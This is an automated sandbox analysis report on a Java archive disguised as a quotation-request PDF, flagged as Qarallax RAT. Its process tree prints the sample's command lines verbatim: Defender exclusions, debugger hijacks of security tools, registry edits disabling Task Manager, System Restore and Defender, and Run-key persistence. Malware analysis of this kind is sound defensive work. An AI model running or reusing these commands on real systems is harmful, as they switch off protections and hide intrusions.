Analysis
-
max time kernel
74s -
max time network
92s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
19-08-2020 08:10
Static task
static1
Behavioral task
behavioral1
Sample
BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar
Resource
win7v200722
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar
Resource
win10v200722
0 signatures
0 seconds
General
-
Target
BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar
-
Size
411KB
-
MD5
10d957699927f69e41cf596817c4ca7b
-
SHA1
dad3d0a7a5cc52c7ef981ab2cc73de64d41c3561
-
SHA256
826f301f5f248d9586c0924a30c56cbb9cda42b82292a1ddd35b0b5ae087413c
-
SHA512
2149a85b712ae88c180353d71dccd1aed9d57c41407c679f070362396914233f3575d00d7394f370201e12e4db7b06f01c0f0a63e223af9f933dc0af53d9e243
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x0003000000013540-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1588 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini java.exe File created C:\Users\Admin\ujTBR\Desktop.ini java.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\zTbvV java.exe File opened for modification C:\Windows\System32\zTbvV java.exe -
Kills process with taskkill 19 IoCs
pid Process 1768 taskkill.exe 1020 taskkill.exe 2180 taskkill.exe 2344 taskkill.exe 1544 taskkill.exe 1804 taskkill.exe 2080 taskkill.exe 2232 taskkill.exe 528 taskkill.exe 332 taskkill.exe 1764 taskkill.exe 1484 taskkill.exe 2316 taskkill.exe 2148 taskkill.exe 2284 taskkill.exe 1356 taskkill.exe 1400 taskkill.exe 1624 taskkill.exe 2124 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1564 powershell.exe 1564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1684 WMIC.exe Token: SeSecurityPrivilege 1684 WMIC.exe Token: SeTakeOwnershipPrivilege 1684 WMIC.exe Token: SeLoadDriverPrivilege 1684 WMIC.exe Token: SeSystemProfilePrivilege 1684 WMIC.exe Token: SeSystemtimePrivilege 1684 WMIC.exe Token: SeProfSingleProcessPrivilege 1684 WMIC.exe Token: SeIncBasePriorityPrivilege 1684 WMIC.exe Token: SeCreatePagefilePrivilege 1684 WMIC.exe Token: SeBackupPrivilege 1684 WMIC.exe Token: SeRestorePrivilege 1684 WMIC.exe Token: SeShutdownPrivilege 1684 WMIC.exe Token: SeDebugPrivilege 1684 WMIC.exe Token: SeSystemEnvironmentPrivilege 1684 WMIC.exe Token: SeRemoteShutdownPrivilege 1684 WMIC.exe Token: SeUndockPrivilege 1684 WMIC.exe Token: SeManageVolumePrivilege 1684 WMIC.exe Token: 33 1684 WMIC.exe Token: 34 1684 WMIC.exe Token: 35 1684 WMIC.exe Token: SeIncreaseQuotaPrivilege 1684 WMIC.exe Token: SeSecurityPrivilege 1684 WMIC.exe Token: SeTakeOwnershipPrivilege 1684 WMIC.exe Token: SeLoadDriverPrivilege 1684 WMIC.exe Token: SeSystemProfilePrivilege 1684 WMIC.exe Token: SeSystemtimePrivilege 1684 WMIC.exe Token: SeProfSingleProcessPrivilege 1684 WMIC.exe Token: SeIncBasePriorityPrivilege 1684 WMIC.exe Token: SeCreatePagefilePrivilege 1684 WMIC.exe Token: SeBackupPrivilege 1684 WMIC.exe Token: SeRestorePrivilege 1684 WMIC.exe Token: SeShutdownPrivilege 1684 WMIC.exe Token: SeDebugPrivilege 1684 WMIC.exe Token: SeSystemEnvironmentPrivilege 1684 WMIC.exe Token: SeRemoteShutdownPrivilege 1684 WMIC.exe Token: SeUndockPrivilege 1684 WMIC.exe Token: SeManageVolumePrivilege 1684 WMIC.exe Token: 33 1684 WMIC.exe Token: 34 1684 WMIC.exe Token: 35 1684 WMIC.exe Token: SeIncreaseQuotaPrivilege 1404 WMIC.exe Token: SeSecurityPrivilege 1404 WMIC.exe Token: SeTakeOwnershipPrivilege 1404 WMIC.exe Token: SeLoadDriverPrivilege 1404 WMIC.exe Token: SeSystemProfilePrivilege 1404 WMIC.exe Token: SeSystemtimePrivilege 1404 WMIC.exe Token: SeProfSingleProcessPrivilege 1404 WMIC.exe Token: SeIncBasePriorityPrivilege 1404 WMIC.exe Token: SeCreatePagefilePrivilege 1404 WMIC.exe Token: SeBackupPrivilege 1404 WMIC.exe Token: SeRestorePrivilege 1404 WMIC.exe Token: SeShutdownPrivilege 1404 WMIC.exe Token: SeDebugPrivilege 1404 WMIC.exe Token: SeSystemEnvironmentPrivilege 1404 WMIC.exe Token: SeRemoteShutdownPrivilege 1404 WMIC.exe Token: SeUndockPrivilege 1404 WMIC.exe Token: SeManageVolumePrivilege 1404 WMIC.exe Token: 33 1404 WMIC.exe Token: 34 1404 WMIC.exe Token: 35 1404 WMIC.exe Token: SeIncreaseQuotaPrivilege 1404 WMIC.exe Token: SeSecurityPrivilege 1404 WMIC.exe Token: SeTakeOwnershipPrivilege 1404 WMIC.exe Token: SeLoadDriverPrivilege 1404 WMIC.exe Token: SeSystemProfilePrivilege 1404 WMIC.exe Token: SeSystemtimePrivilege 1404 WMIC.exe Token: SeProfSingleProcessPrivilege 1404 WMIC.exe Token: SeIncBasePriorityPrivilege 1404 WMIC.exe Token: SeCreatePagefilePrivilege 1404 WMIC.exe Token: SeBackupPrivilege 1404 WMIC.exe Token: SeRestorePrivilege 1404 WMIC.exe Token: SeShutdownPrivilege 1404 WMIC.exe Token: SeDebugPrivilege 1404 WMIC.exe Token: SeSystemEnvironmentPrivilege 1404 WMIC.exe Token: SeRemoteShutdownPrivilege 1404 WMIC.exe Token: SeUndockPrivilege 1404 WMIC.exe Token: SeManageVolumePrivilege 1404 WMIC.exe Token: 33 1404 WMIC.exe Token: 34 1404 WMIC.exe Token: 35 1404 WMIC.exe Token: SeDebugPrivilege 1020 taskkill.exe Token: SeDebugPrivilege 528 taskkill.exe Token: SeDebugPrivilege 1356 taskkill.exe Token: SeDebugPrivilege 332 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 1768 taskkill.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 1484 taskkill.exe Token: SeDebugPrivilege 1400 taskkill.exe Token: SeDebugPrivilege 1624 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 1804 taskkill.exe Token: SeDebugPrivilege 2124 taskkill.exe Token: SeDebugPrivilege 2080 taskkill.exe Token: SeDebugPrivilege 2148 taskkill.exe Token: SeDebugPrivilege 2180 taskkill.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeDebugPrivilege 2316 taskkill.exe Token: SeDebugPrivilege 2284 taskkill.exe Token: SeDebugPrivilege 2344 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1588 java.exe -
Suspicious use of WriteProcessMemory 228 IoCs
description pid Process procid_target PID 1588 wrote to memory of 1524 1588 java.exe 25 PID 1588 wrote to memory of 1524 1588 java.exe 25 PID 1588 wrote to memory of 1524 1588 java.exe 25 PID 1588 wrote to memory of 1504 1588 java.exe 26 PID 1588 wrote to memory of 1504 1588 java.exe 26 PID 1588 wrote to memory of 1504 1588 java.exe 26 PID 1504 wrote to memory of 1684 1504 cmd.exe 27 PID 1504 wrote to memory of 1684 1504 cmd.exe 27 PID 1504 wrote to memory of 1684 1504 cmd.exe 27 PID 1588 wrote to memory of 1768 1588 java.exe 28 PID 1588 wrote to memory of 1768 1588 java.exe 28 PID 1588 wrote to memory of 1768 1588 java.exe 28 PID 1768 wrote to memory of 1404 1768 cmd.exe 29 PID 1768 wrote to memory of 1404 1768 cmd.exe 29 PID 1768 wrote to memory of 1404 1768 cmd.exe 29 PID 1588 wrote to memory of 1880 1588 java.exe 30 PID 1588 wrote to memory of 1880 1588 java.exe 30 PID 1588 wrote to memory of 1880 1588 java.exe 30 PID 1588 wrote to memory of 1896 1588 java.exe 31 PID 1588 wrote to memory of 1896 1588 java.exe 31 PID 1588 wrote to memory of 1896 1588 java.exe 31 PID 1588 wrote to memory of 1908 1588 java.exe 32 PID 1588 wrote to memory of 1908 1588 java.exe 32 PID 1588 wrote to memory of 1908 1588 java.exe 32 PID 1588 wrote to memory of 1844 1588 java.exe 33 PID 1588 wrote to memory of 1844 1588 java.exe 33 PID 1588 wrote to memory of 1844 1588 java.exe 33 PID 1588 wrote to memory of 1824 1588 java.exe 34 PID 1588 wrote to memory of 1824 1588 java.exe 34 PID 1588 wrote to memory of 1824 1588 java.exe 34 PID 1588 wrote to memory of 1832 1588 java.exe 35 PID 1588 wrote to memory of 1832 1588 java.exe 35 PID 1588 wrote to memory of 1832 1588 java.exe 35 PID 1588 wrote to memory of 524 1588 java.exe 36 PID 1588 wrote to memory of 524 1588 java.exe 36 PID 1588 wrote to memory of 524 1588 java.exe 36 PID 1588 wrote to memory of 664 1588 java.exe 37 PID 1588 wrote to memory of 664 1588 java.exe 37 PID 1588 wrote to memory of 664 1588 java.exe 37 PID 1588 wrote to memory of 1628 1588 java.exe 38 PID 1588 wrote to memory of 1628 1588 java.exe 38 PID 1588 wrote to memory of 1628 1588 java.exe 38 PID 1588 wrote to memory of 1564 1588 java.exe 39 PID 1588 wrote to memory of 1564 1588 java.exe 39 PID 1588 wrote to memory of 1564 1588 java.exe 39 PID 1588 wrote to memory of 1020 1588 java.exe 40 PID 1588 wrote to memory of 1020 1588 java.exe 40 PID 1588 wrote to memory of 1020 1588 java.exe 40 PID 1588 wrote to memory of 1544 1588 java.exe 43 PID 1588 wrote to memory of 1544 1588 java.exe 43 PID 1588 wrote to memory of 1544 1588 java.exe 43 PID 1588 wrote to memory of 1960 1588 java.exe 44 PID 1588 wrote to memory of 1960 1588 java.exe 44 PID 1588 wrote to memory of 1960 1588 java.exe 44 PID 1588 wrote to memory of 1936 1588 java.exe 45 PID 1588 wrote to memory of 1936 1588 java.exe 45 PID 1588 wrote to memory of 1936 1588 java.exe 45 PID 1588 wrote to memory of 2036 1588 java.exe 46 PID 1588 wrote to memory of 2036 1588 java.exe 46 PID 1588 wrote to memory of 2020 1588 java.exe 47 PID 1588 wrote to memory of 2036 1588 java.exe 46 PID 1588 wrote to memory of 2020 1588 java.exe 47 PID 1588 wrote to memory of 2020 1588 java.exe 47 PID 1588 wrote to memory of 1076 1588 java.exe 50 PID 1588 wrote to memory of 1076 1588 java.exe 50 PID 1588 wrote to memory of 1076 1588 java.exe 50 PID 1588 wrote to memory of 1140 1588 java.exe 51 PID 1588 wrote to memory of 1140 1588 java.exe 51 PID 1588 wrote to memory of 1140 1588 java.exe 51 PID 1628 wrote to memory of 564 1628 cmd.exe 56 PID 1628 wrote to memory of 564 1628 cmd.exe 56 PID 1628 wrote to memory of 564 1628 cmd.exe 56 PID 1588 wrote to memory of 1480 1588 java.exe 57 PID 1588 wrote to memory of 1480 1588 java.exe 57 PID 1588 wrote to memory of 1552 1588 java.exe 58 PID 1588 wrote to memory of 1480 1588 java.exe 57 PID 1588 wrote to memory of 1552 1588 java.exe 58 PID 1588 wrote to memory of 1552 1588 java.exe 58 PID 1588 wrote to memory of 1684 1588 java.exe 61 PID 1588 wrote to memory of 1684 1588 java.exe 61 PID 1588 wrote to memory of 1684 1588 java.exe 61 PID 1588 wrote to memory of 1400 1588 java.exe 64 PID 1588 wrote to memory of 1400 1588 java.exe 64 PID 1588 wrote to memory of 1400 1588 java.exe 64 PID 1628 wrote to memory of 1876 1628 cmd.exe 65 PID 1628 wrote to memory of 1876 1628 cmd.exe 65 PID 1628 wrote to memory of 1876 1628 cmd.exe 65 PID 1588 wrote to memory of 1836 1588 java.exe 67 PID 1588 wrote to memory of 1836 1588 java.exe 67 PID 1588 wrote to memory of 1836 1588 java.exe 67 PID 1588 wrote to memory of 528 1588 java.exe 68 PID 1588 wrote to memory of 528 1588 java.exe 68 PID 1588 wrote to memory of 528 1588 java.exe 68 PID 1588 wrote to memory of 1640 1588 java.exe 69 PID 1588 wrote to memory of 1640 1588 java.exe 69 PID 1588 wrote to memory of 1640 1588 java.exe 69 PID 1588 wrote to memory of 1572 1588 java.exe 70 PID 1588 wrote to memory of 1572 1588 java.exe 70 PID 1588 wrote to memory of 1572 1588 java.exe 70 PID 1836 wrote to memory of 1952 1836 cmd.exe 71 PID 1836 wrote to memory of 1952 1836 cmd.exe 71 PID 1836 wrote to memory of 1952 1836 cmd.exe 71 PID 1588 wrote to memory of 2004 1588 java.exe 73 PID 1588 wrote to memory of 2004 1588 java.exe 73 PID 1588 wrote to memory of 2004 1588 java.exe 73 PID 1588 wrote to memory of 2044 1588 java.exe 75 PID 1588 wrote to memory of 2044 1588 java.exe 75 PID 1588 wrote to memory of 2044 1588 java.exe 75 PID 1588 wrote to memory of 1544 1588 java.exe 78 PID 1588 wrote to memory of 1544 1588 java.exe 78 PID 1588 wrote to memory of 1544 1588 java.exe 78 PID 1836 wrote to memory of 1508 1836 cmd.exe 79 PID 1836 wrote to memory of 1508 1836 cmd.exe 79 PID 1836 wrote to memory of 1508 1836 cmd.exe 79 PID 1588 wrote to memory of 1668 1588 java.exe 81 PID 1588 wrote to memory of 1668 1588 java.exe 81 PID 1588 wrote to memory of 1668 1588 java.exe 81 PID 1588 wrote to memory of 1756 1588 java.exe 85 PID 1588 wrote to memory of 1036 1588 java.exe 84 PID 1588 wrote to memory of 1756 1588 java.exe 85 PID 1588 wrote to memory of 1036 1588 java.exe 84 PID 1588 wrote to memory of 1756 1588 java.exe 85 PID 1588 wrote to memory of 1036 1588 java.exe 84 PID 1588 wrote to memory of 1356 1588 java.exe 86 PID 1588 wrote to memory of 1356 1588 java.exe 86 PID 1588 wrote to memory of 1356 1588 java.exe 86 PID 1588 wrote to memory of 1832 1588 java.exe 88 PID 1588 wrote to memory of 1832 1588 java.exe 88 PID 1588 wrote to memory of 1832 1588 java.exe 88 PID 1588 wrote to memory of 1896 1588 java.exe 90 PID 1588 wrote to memory of 1896 1588 java.exe 90 PID 1588 wrote to memory of 1896 1588 java.exe 90 PID 1588 wrote to memory of 1816 1588 java.exe 94 PID 1588 wrote to memory of 1816 1588 java.exe 94 PID 1588 wrote to memory of 1816 1588 java.exe 94 PID 1588 wrote to memory of 1552 1588 java.exe 95 PID 1588 wrote to memory of 1552 1588 java.exe 95 PID 1588 wrote to memory of 1552 1588 java.exe 95 PID 1588 wrote to memory of 1424 1588 java.exe 97 PID 1588 wrote to memory of 1424 1588 java.exe 97 PID 1588 wrote to memory of 1424 1588 java.exe 97 PID 1552 wrote to memory of 1612 1552 cmd.exe 98 PID 1552 wrote to memory of 1612 1552 cmd.exe 98 PID 1552 wrote to memory of 1612 1552 cmd.exe 98 PID 1552 wrote to memory of 1892 1552 cmd.exe 100 PID 1552 wrote to memory of 1892 1552 cmd.exe 100 PID 1552 wrote to memory of 1892 1552 cmd.exe 100 PID 1588 wrote to memory of 332 1588 java.exe 101 PID 1588 wrote to memory of 332 1588 java.exe 101 PID 1588 wrote to memory of 332 1588 java.exe 101 PID 1588 wrote to memory of 1348 1588 java.exe 103 PID 1588 wrote to memory of 1348 1588 java.exe 103 PID 1588 wrote to memory of 1348 1588 java.exe 103 PID 1588 wrote to memory of 1764 1588 java.exe 104 PID 1588 wrote to memory of 1764 1588 java.exe 104 PID 1588 wrote to memory of 1764 1588 java.exe 104 PID 1348 wrote to memory of 2004 1348 cmd.exe 106 PID 1348 wrote to memory of 2004 1348 cmd.exe 106 PID 1348 wrote to memory of 2004 1348 cmd.exe 106 PID 1588 wrote to memory of 840 1588 java.exe 108 PID 1588 wrote to memory of 840 1588 java.exe 108 PID 1588 wrote to memory of 840 1588 java.exe 108 PID 1588 wrote to memory of 1768 1588 java.exe 109 PID 1588 wrote to memory of 1768 1588 java.exe 109 PID 1588 wrote to memory of 1768 1588 java.exe 109 PID 1588 wrote to memory of 2020 1588 java.exe 112 PID 1588 wrote to memory of 2020 1588 java.exe 112 PID 1588 wrote to memory of 2020 1588 java.exe 112 PID 1588 wrote to memory of 1908 1588 java.exe 114 PID 1588 wrote to memory of 1908 1588 java.exe 114 PID 1588 wrote to memory of 1908 1588 java.exe 114 PID 1588 wrote to memory of 1620 1588 java.exe 116 PID 1588 wrote to memory of 1620 1588 java.exe 116 PID 1588 wrote to memory of 1620 1588 java.exe 116 PID 1588 wrote to memory of 1832 1588 java.exe 118 PID 1588 wrote to memory of 1832 1588 java.exe 118 PID 1588 wrote to memory of 1832 1588 java.exe 118 PID 1588 wrote to memory of 1464 1588 java.exe 120 PID 1588 wrote to memory of 1464 1588 java.exe 120 PID 1588 wrote to memory of 1464 1588 java.exe 120 PID 1588 wrote to memory of 872 1588 java.exe 122 PID 1588 wrote to memory of 872 1588 java.exe 122 PID 1588 wrote to memory of 872 1588 java.exe 122 PID 1588 wrote to memory of 1484 1588 java.exe 123 PID 1588 wrote to memory of 1484 1588 java.exe 123 PID 1588 wrote to memory of 1484 1588 java.exe 123 PID 1588 wrote to memory of 1524 1588 java.exe 125 PID 1588 wrote to memory of 1524 1588 java.exe 125 PID 1588 wrote to memory of 1524 1588 java.exe 125 PID 1588 wrote to memory of 2028 1588 java.exe 128 PID 1588 wrote to memory of 2028 1588 java.exe 128 PID 1588 wrote to memory of 2028 1588 java.exe 128 PID 1588 wrote to memory of 1400 1588 java.exe 130 PID 1588 wrote to memory of 1400 1588 java.exe 130 PID 1588 wrote to memory of 1400 1588 java.exe 130 PID 1588 wrote to memory of 1624 1588 java.exe 132 PID 1588 wrote to memory of 1624 1588 java.exe 132 PID 1588 wrote to memory of 1624 1588 java.exe 132 PID 1588 wrote to memory of 1544 1588 java.exe 134 PID 1588 wrote to memory of 1544 1588 java.exe 134 PID 1588 wrote to memory of 1544 1588 java.exe 134 PID 1588 wrote to memory of 1804 1588 java.exe 136 PID 1588 wrote to memory of 1804 1588 java.exe 136 PID 1588 wrote to memory of 1804 1588 java.exe 136 PID 1588 wrote to memory of 2080 1588 java.exe 138 PID 1588 wrote to memory of 2080 1588 java.exe 138 PID 1588 wrote to memory of 2080 1588 java.exe 138 PID 1588 wrote to memory of 2124 1588 java.exe 140 PID 1588 wrote to memory of 2124 1588 java.exe 140 PID 1588 wrote to memory of 2124 1588 java.exe 140 PID 1588 wrote to memory of 2148 1588 java.exe 142 PID 1588 wrote to memory of 2148 1588 java.exe 142 PID 1588 wrote to memory of 2148 1588 java.exe 142 PID 1588 wrote to memory of 2180 1588 java.exe 144 PID 1588 wrote to memory of 2180 1588 java.exe 144 PID 1588 wrote to memory of 2180 1588 java.exe 144 PID 1588 wrote to memory of 2232 1588 java.exe 146 PID 1588 wrote to memory of 2232 1588 java.exe 146 PID 1588 wrote to memory of 2232 1588 java.exe 146 PID 1588 wrote to memory of 2284 1588 java.exe 148 PID 1588 wrote to memory of 2284 1588 java.exe 148 PID 1588 wrote to memory of 2284 1588 java.exe 148 PID 1588 wrote to memory of 2316 1588 java.exe 150 PID 1588 wrote to memory of 2316 1588 java.exe 150 PID 1588 wrote to memory of 2316 1588 java.exe 150 PID 1588 wrote to memory of 2344 1588 java.exe 152 PID 1588 wrote to memory of 2344 1588 java.exe 152 PID 1588 wrote to memory of 2344 1588 java.exe 152 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1908 attrib.exe 1844 attrib.exe 1824 attrib.exe 1832 attrib.exe 524 attrib.exe 664 attrib.exe 1880 attrib.exe 1896 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1524
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1880
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1896
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1908
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1844
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1824
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1832
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:524
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class2⤵
- Views/modifies file attributes
PID:664
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:564
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1876
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1564
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1020
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1544
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1960
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1936
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:2036
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2020
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:1076
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1140
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1480
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1552
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1684
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1400
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1508
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:528
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1640
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1572
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2004
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:2044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1544
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:1668
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1036
-
-
